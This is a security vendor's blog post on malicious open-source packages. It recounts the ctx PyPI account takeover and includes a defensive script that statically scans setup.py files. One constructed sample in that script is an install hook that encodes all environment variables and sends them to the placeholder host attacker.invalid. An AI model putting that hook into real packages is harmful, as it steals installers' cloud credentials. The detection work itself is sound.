Security incidents and malware attacks hit the headlines so often that they can feel like background noise. Analysts found that 78% of surveyed organizations reported a breach in the previous year. Attackers are getting more inventive and opportunistic, and the sprawl of open-source components and AI-generated code gives them more to work with. As one recent incident shows, even a small oversight can have outsized consequences.
In May 2022, a security researcher executed a stunt straight out of Blackhat, the Chris Hemsworth cyber-thriller in which hackers quietly infiltrate global systems. For just $5, he bought an expired domain – one that had once belonged to the maintainer of ctx, a long-abandoned Python package. Because the maintainer's account on PyPI, the Python Package Index, was registered to an email address on that domain, he could request a password reset, receive the reset link himself, and take over the account. He then uploaded a new version of ctx whose code ran on installation and silently exfiltrated AWS credentials from any system that installed it.
The implications were serious. Anyone who installed the compromised version on a system holding AWS credentials could unknowingly hand attackers access to their AWS environment, and AWS powers roughly 31% of the global cloud infrastructure market.
No brute force. No zero-day exploit. Just an expired domain, a forgotten package, and a few lines of malicious code – enough to launch what is now known as a “malicious package” attack, delivered here through account takeover rather than a typosquat. The lesson for maintainers is that email-based password reset is only as strong as the domain behind the address: keep recovery addresses on a domain you control, and enable two-factor authentication on the registry (PyPI has since made it mandatory).
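The install-time behaviour in the ctx incident has a recognisable shape: read the process environment (where CI runners and cloud SDKs keep keys), send it somewhere over the network, and hook the setuptools install command so that both happen during pip install. The script below, added here as an example and not Checkmarx code or the real ctx payload, statically triages a setup.py for that combination using Python's ast module, without executing it. Both setup.py samples are constructed for illustration, and the host name attacker.invalid is a placeholder on a reserved TLD.

```python
# Static triage of a setup.py for the install-time exfiltration pattern:
# environment read + network sink + setuptools install hook. Added example;
# the samples at the bottom are constructed and are not the real ctx code.
import ast
from dataclasses import dataclass

NETWORK_MODULES = {"urllib", "requests", "socket", "http", "httpx", "ftplib", "smtplib"}
CREDENTIAL_READS = {"os.environ", "os.getenv"}          # where cloud keys usually live
DYNAMIC_EXEC = {"exec", "eval", "compile"}              # typical second-stage loader
INSTALL_HOOK_BASES = {"install", "develop", "egg_info", "build_py"}  # run at pip install


@dataclass
class Finding:
    kind: str      # credential_read | network_import | network_call | install_hook | dynamic_exec
    lineno: int
    detail: str


def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


class _Triage(ast.NodeVisitor):
    def __init__(self):
        self.findings = []
        self.network_names = set()  # local names bound to network modules/functions

    def visit_Import(self, node):
        for alias in node.names:
            root = alias.name.split(".")[0]
            if root in NETWORK_MODULES:
                self.network_names.add(alias.asname or root)
                self.findings.append(Finding("network_import", node.lineno, alias.name))
        self.generic_visit(node)

    def visit_ImportFrom(self, node):
        module = node.module or ""
        if module.split(".")[0] in NETWORK_MODULES:
            self.network_names.update(a.asname or a.name for a in node.names)
            self.findings.append(Finding("network_import", node.lineno, module))
        self.generic_visit(node)

    def visit_ClassDef(self, node):
        for base in node.bases:
            name = _dotted(base)
            if name and name.split(".")[-1] in INSTALL_HOOK_BASES:
                self.findings.append(Finding("install_hook", node.lineno, f"class {node.name}({name})"))
        self.generic_visit(node)

    def visit_Attribute(self, node):
        name = _dotted(node)
        if name in CREDENTIAL_READS:
            self.findings.append(Finding("credential_read", node.lineno, name))
        self.generic_visit(node)

    def visit_Call(self, node):
        name = _dotted(node.func)
        if name:
            root = name.split(".")[0]
            if root in NETWORK_MODULES or root in self.network_names:
                self.findings.append(Finding("network_call", node.lineno, name))
            if name in DYNAMIC_EXEC:
                self.findings.append(Finding("dynamic_exec", node.lineno, name))
        self.generic_visit(node)


def triage_setup_py(source: str) -> dict:
    """Parse (never execute) setup.py source and return findings plus a verdict:
    BLOCK = environment read combined with a network sink, REVIEW = any single
    indicator, PASS = nothing flagged."""
    visitor = _Triage()
    visitor.visit(ast.parse(source))
    kinds = {f.kind for f in visitor.findings}
    exfil = "credential_read" in kinds and bool(kinds & {"network_call", "network_import"})
    return {
        "findings": visitor.findings,
        "install_hook": "install_hook" in kinds,
        "exfiltration_pattern": exfil,
        "verdict": "BLOCK" if exfil else ("REVIEW" if kinds else "PASS"),
    }


# Constructed sample: a clean setup.py that only declares metadata.
BENIGN_SETUP_PY = '''
from setuptools import setup, find_packages

setup(name="example-utility", version="0.1.0", packages=find_packages())
'''

# Constructed sample modelled on the pattern in the article (not the real code):
# an install hook that dumps the environment and posts it to a placeholder host.
SUSPICIOUS_SETUP_PY = '''
import os
import base64
import urllib.request
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        install.run(self)
        blob = base64.b64encode(repr(dict(os.environ)).encode()).decode()
        urllib.request.urlopen("https://attacker.invalid/collect?d=" + blob)

setup(name="example-utility", version="0.1.1", cmdclass={"install": PostInstall})
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP_PY), ("suspicious", SUSPICIOUS_SETUP_PY)):
        report = triage_setup_py(src)
        print(f"{label}: {report['verdict']}")
        for f in report["findings"]:
            print(f"  line {f.lineno}: {f.kind} -> {f.detail}")
```

Run it against the sdist you get from pip download rather than against an installed package, so nothing has executed yet. A static pass like this is a first filter only: it will miss aliased imports such as from os import environ, string-built module names, and payloads that only appear after a decoded second stage is executed, which is why a verdict of REVIEW or BLOCK should be followed by running the package in an isolated sandbox and watching its actual network and file behaviour.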
The researcher later insisted it was all for “research,” but the episode became a wake-up call for the open-source community. It is a reminder that in an interconnected software world, trust can be breached for the price of a cup of coffee.
Packages are Proliferating
Malicious packages often begin as trusted, open-source components – created and shared by well-intentioned developers – that are then twisted into nefarious tools which steal credentials, open backdoors, mine cryptocurrency, deploy ransomware, or destabilize entire platforms. Some masquerade as legitimate updates or forks of popular libraries, which makes them dangerously hard to detect.
Now, with AI generating code at unprecedented speed, malicious packages are multiplying faster than ever. According to Sonatype’s Q2 2025 Open-Source Malware Index, they surged 188% year over year – not a blip, but a potential tidal wave.
Let’s Take a Deep Dive…
That’s why we at Checkmarx are taking a proactive approach. In our new research eBook, we investigate and explain how these packages evolve, spread, and infiltrate the software supply chain. We give organizations insight into identifying, deflecting, and neutralizing them before they strike.
We’re not just studying this phenomenon – we’re tracking it in real time. Our research teams collect and analyze suspicious packages in isolated, sandboxed “detonation chambers,” environments completely detached from production networks. There, we safely execute and observe malicious behaviors to understand how they operate and what they target, so that we stay one step ahead of their evolution.
So far, we’ve trapped over 410,000 known malicious or suspicious packages – each tagged, analyzed, and added to our database. This intelligence directly powers Checkmarx One, one of the few AppSec platforms capable of blocking malicious packages before installation.
Open-source threats move fast, so your prevention has to move faster. That’s why Checkmarx One provides security that moves at the speed of modern development, integrating Software Composition Analysis (SCA), malicious-package scanning, and proactive vulnerability detection directly into developer workflows. Vulnerabilities are detected before they become problems, right on the developer’s desktop.
Full-Circle: From $5 Hack to a Safer Future
That $5 hack from three years ago was a warning shot – a glimpse of how automation, open-source sprawl, and AI-generated code are reshaping the threat landscape at exponential speed.
Download the full eBook to learn more about malicious packages and how to spot the next wave before it hits. Stay vigilant and know that Checkmarx is here to help you stay one step ahead – through Cybersecurity Month and into the ever-accelerating future of AI-driven software development.